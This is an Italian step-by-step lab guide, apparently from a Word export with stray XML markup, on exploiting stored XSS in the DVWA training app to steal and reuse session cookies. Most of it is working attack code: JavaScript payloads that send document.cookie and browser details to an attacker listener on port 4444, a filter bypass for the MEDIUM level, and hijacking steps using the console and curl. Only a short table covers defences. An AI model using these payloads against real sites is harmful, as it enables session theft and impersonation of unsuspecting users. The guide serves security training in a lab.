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wi5bgjkhl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XSS Persistente su DVWA - Furto di Sessione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pzd1ow4jz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Panoramica dell'Attacco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Sfruttando una vulnerabilità XSS persistente (stored) nel guestbook di DVWA, iniettiamo uno script JavaScript che ruba i cookie di sessione degli utenti e li invia al nostro web server in ascolto sulla porta 4444.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9dgx1hof9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1: Configurazione Iniziale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o72h4muqw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Accesso a DVWA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URL: http://192.168.104.150/dvwa/login.php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Credenziali: admin / password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f7anbqm8k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Imposta Livello LOW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Menu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DVWA Security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Seleziona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pr85y14o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Avvia Web Server in Ascolto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Sul terminale di Kali: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nc -lvnp 4444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8b2gsznqd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2: Creazione Script di Attacco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sdv45oqw0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Script Base per Rubare Cookie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Script JavaScript da iniettare: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// Raccoglie i cookie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var cookie = document.cookie;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// Crea URL con il cookie rubato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var url = "http://192.168.104.100:4444/?" + cookie;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// Invia il cookie al web server (senza essere visti)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var img = new Image();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img.src = url;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5faa2tkdp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Spiegazione dello Script</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="9405.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3900"/>
        <w:gridCol w:w="5505"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3900"/>
            <w:gridCol w:w="55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document.cookie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Legge tutti i cookie della pagina corrente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http://192.168.104.100:4444/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IP del server Kali in ascolto sulla porta 4444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new Image()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Crea un oggetto immagine invisibile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img.src =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Invia una richiesta GET contenente il cookie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Meccanismo:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quando un utente visita la pagina, lo script viene eseguito automaticamente, ruba i suoi cookie e li invia al nostro server.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fiz42zhck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3: Iniezione nel Guestbook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7y7zzc4sr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Accedere al Guestbook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Menu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XSS (Stored)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Compila il form:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="6090.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="4890"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1200"/>
            <w:gridCol w:w="4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Script di attacco (vedi sotto)</w:t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c6u2ewn88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Payload da Iniettare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Nel campo "Message":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var cookie = document.cookie;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var url = "http://192.168.104.100:4444/?" + cookie;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var img = new Image();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img.src = url;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31xiaira2e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Clicca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Sign Guestbook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s9tttddad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4: Furto dei Cookie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3v1v70xk6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Attesa degli Utenti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un utente visita il guestbook, lo script si esegue automaticamente.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lfqmqhiuk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Ricezione dei Cookie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Sul terminale di Kali (server in ascolto):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d0e9lyrcz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5: Utilizzo del Cookie Rubato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c7cnoabyp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Iniettare il Cookie nel Browser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Metodo 1: Developer Console (F12)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// Inserisci il cookie rubato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document.cookie = "PHPSESSID=abc123def456; security=low";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location.reload();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Metodo 2: Cookie Editor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Installa estensione "EditThisCookie" (Chrome/Firefox)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Aggiungi manualmente il cookie rubato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Metodo 3: Terminale con curl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curl -v --cookie "PHPSESSID=abc123def456; security=low" \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http://192.168.104.150/dvwa/index.php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s0wqe7mx5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Verifica Accesso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Apri il browser in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">modalità privata</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (o su un altro browser)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Vai su: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http://192.168.104.150/dvwa/index.php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Apri Developer Tools (F12) → Console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Inserisci il cookie rubato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Ricarica la pagina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dq4kdxe7ol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6: Livello MEDIUM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ecgb3957h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Imposta Livello Medium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Menu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DVWA Security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Seleziona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km7qp4xro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Differenze nel Medium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campo "Message" è protetto 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htmlspecialchars()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, ma </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Name"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> no!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Payload per Medium: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var cookie = document.cookie;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var url = "http://192.168.104.100:4444/?" + cookie;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var img = new Image();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img.src = url;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Inserisci nel campo "Name", NON in "Message"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uiu1x4by5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Spiegazione della Differenza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LOW:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sia Name che Message sono vulnerabili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MEDIUM:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Solo Name è vulnerabile (Message ha protezione)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g7q5rxf5p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7: Script Avanzato - Dump Completo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5g229d05ns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Script che ruba più informazioni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// Cookie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var cookie = document.cookie;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// Browser e OS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var browser = navigator.userAgent;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// IP (via richiesta esterna)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var ip = "";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// Data e ora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var data = new Date().toLocaleString();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// Raccogli tutto in un unico pacchetto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var info = "Cookie: " + cookie +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" | Browser: " + browser +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" | Data: " + data;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// Invia al server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var url = "http://192.168.104.100:4444/?" + encodeURIComponent(info);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var img = new Image();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img.src = url;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omu2b27hdq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Ricezione dei Dati Complet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Sul terminale Kali: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192.168.104.150 - - [27/Jul/2026 12:30:15] "GET /?Cookie%3A%20PHPSESSID%3Dabc123... HTTP/1.1" 200 -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w9vl8y6xv1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8: Guida Illustrata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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sez78h51t01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Cos'è il XSS Persistente?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XSS PERSISTENTE (STORED XSS)                       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L'attaccante inserisce uno script maligno nel database del sito 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 script viene salvato PERMANENTEMENTE    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Ogni utente che visita la pagina infetta esegue lo script senza saperlo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cookie degli utenti vengono RUBATI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L'attaccante può FINGERSI l'utente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sfcenx5oi5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Passi per l'Attacco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PROCEDURA PASSAGGIO PER PASSAGGIO                      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                                    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STEP 1: Avviare server in ascolto                      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$ python3 -m http.server 4444                                                                                    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STEP 2: Inserire script nel guestbook                  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&lt;script&gt;...rubacookie...&lt;script&gt;                       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                                     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STEP 3: Attendere vittime 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STEP 4: Ricevere cookie su server                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GET /?PHPSESSID=abc123...    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                  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STEP 5: Usare cookie rubato                     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document.cookie = "PHPSESSID=abc123..."  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STEP 6: Accesso come vittima                           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Sessione rubata con successo!                     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dlsx7uhomm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Proteggersi da XSS</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="8920.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4790"/>
        <w:gridCol w:w="4130"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4790"/>
            <w:gridCol w:w="41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Cosa NON Fare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Cosa Fare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Inserire input utente direttamente in HTML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Usare htmlspecialchars()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Fidarsi dei cookie senza verifica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Usare HttpOnly flag sui cookie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Salvare script nel database senza sanitizzazione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Sanitizzare l'input prima di salvarlo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Usare innerHTML con dati utente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Usare textContent invece di innerHTML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ijxt2pey5k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Riepilogo Comandi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1. Avvia server per ricevere cookie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python3 -m http.server 4444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 2. Script da iniettare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var cookie = document.cookie;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var url = "http://192.168.104.100:4444/?" + cookie;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var img = new Image();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img.src = url;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3. Usare cookie rubato (nella console del browser)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document.cookie = "PHPSESSID=abc123def456; security=low";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location.reload();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 4. Verificare con curl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curl -v --cookie "PHPSESSID=abc123def456; security=low" \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http://192.168.104.150/dvwa/index.php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yftyu9ie1y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RISULTATO FINALE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Hai rubato con successo la sessione di un utente del sito utilizzando XSS persistente!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Cookie rubato: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PHPSESSID=abc123def456; security=low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Ora puoi navigare sul sito come se fossi la vittima!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